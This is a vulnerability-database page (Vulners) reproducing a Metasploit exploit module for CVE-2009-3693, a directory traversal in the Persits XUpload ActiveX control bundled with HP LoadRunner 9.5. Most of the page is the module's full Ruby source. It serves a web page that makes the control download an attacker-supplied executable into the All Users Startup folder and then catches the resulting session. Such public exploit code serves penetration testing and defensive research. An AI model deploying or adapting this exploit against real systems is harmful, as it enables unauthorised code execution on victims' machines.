Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Persits XUpload - ActiveX MakeHttpRequest Directory Traversal (Metasploit)

🗓️ 11 Nov 2010 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 34 Views

Persits XUpload ActiveX MakeHttpRequest Directory Traversal in HP LoadRunner 9.5. Exploits directory traversal to write arbitrary files to disk, allowing code execution by writing to All Users Startup Programs directory

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2009-3693
29 Sep 200900:00
circl
CVE		CVE-2009-3693
13 Oct 200910:00
cve
Cvelist		CVE-2009-3693
13 Oct 200910:00
cvelist
d2		DSquare Exploit Pack: D2SEC_XUPLOAD2
13 Oct 200910:30
d2
Metasploit		Persits XUpload ActiveX MakeHttpRequest Directory Traversal
8 Dec 200903:08
metasploit
NVD		CVE-2009-3693
13 Oct 200910:30
nvd
Packet Storm		Persits XUpload ActiveX MakeHttpRequest Directory Traversal
31 Dec 200900:00
packetstorm
Prion		Directory traversal
13 Oct 200910:30
prion
RedhatCVE		CVE-2009-3693
21 May 202519:49
redhatcve
Saint		HP LoadRunner XUpload ActiveX control MakeHttpRequest file download
21 Oct 200900:00
saint
Rows per page
##
# $Id: persits_xupload_traversal.rb 10998 2010-11-11 22:43:22Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::EXE

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Persits XUpload ActiveX MakeHttpRequest Directory Traversal',
			'Description'    => %q{
					This module exploits a directory traversal in Persits Software Inc's
				XUpload ActiveX control(version 3.0.0.3) that's included in HP LoadRunner 9.5.
				By passing a string containing "..\\" sequences to the MakeHttpRequest method,
				an attacker is able to write arbitrary files to arbitrary locations on disk.

				Code execution occurs by writing to the All Users Startup Programs directory.
				You may want to combine this module with the use of multi/handler since a
				user would have to log for the payloda to execute.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'jduck' ],
			'Version'        => '$Revision: 10998 $',
			'References'     =>
				[
					[ 'CVE', '2009-3693'],
					[ 'OSVDB', '60001'],
					[ 'URL', 'http://retrogod.altervista.org/9sg_hp_loadrunner.html' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 2048,
					'Compat'   =>
						{
							'ConnectionType' => '-find',
						}
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic',  { } ],
				],
			'DisclosureDate' => 'Sep 29 2009',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('PATH', [ true, 'The path to place the executable.', '../../../Documents and Settings/All Users/Start Menu/Programs/Startup/']),
			], self.class)
	end

	def on_request_uri(cli, request)

		uri,token = request.uri.split('?', 2)

		print_status("request fired : #{uri}")

		if !token
			# randomize some stuff
			objid = rand_text_alpha(rand(100) + 1)
			func = rand_text_alpha(rand(100) + 1)

			# send the html that makes the payload get downloaded
			token = rand_text_numeric(32)
			if ("/" == get_resource[-1,1])
				exe_uri = get_resource[0, get_resource.length - 1]
			else
				exe_uri = get_resource
			end
			exe_uri << "?" + token

			exe_host = ""
			exe_host << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'])

			exe_hostport = datastore['SRVPORT']

			exe_name = datastore['PATH'].dup
			exe_name << rand_text_alphanumeric(rand(100) + 1)
			exe_name << ".exe"

			html = %Q|<html>
<head>
<script language='javascript'>
function #{func}()
{
#{objid}.Server = "#{exe_host}";
#{objid}.Script = "#{exe_uri}";
#{objid}.Port = #{exe_hostport};
#{objid}.MakeHttpRequest("","","#{exe_name}","","")
}
</script>
</head>
<body onload='javascript:#{func}()'>
<object classid='clsid:E87F6C8E-16C0-11D3-BEF7-009027438003' id=#{objid}></object>
</body>
</html>
|
			print_status("Sending exploit html to #{cli.peerhost}:#{cli.peerport}...")

			# Transmit the response to the client
			send_response(cli, html,
				{
					'Connection'   => 'close',
					'Pragma'       => 'no-cache'
				})
			return
		end

		print_status("Sending payload exe to #{cli.peerhost}:#{cli.peerport}...")
		return if ((p = regenerate_payload(cli)) == nil)
		data = generate_payload_exe({ :code => p.encoded })

		# send the exe
		send_response(cli, data,
			{
				'Content-Type' => 'application/octet-stream',
				'Connection'   => 'close',
				'Pragma'       => 'no-cache'
			})

		# Handle the payload
		handler(cli)
	end

end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 Nov 2010 00:00Current
7High risk
Vulners AI Score7
CVSS 29.3
EPSS0.70886
directory traversalpersits xuploadactivexcode executionhp loadrunnerarbitrary filesdiskmetasploit
34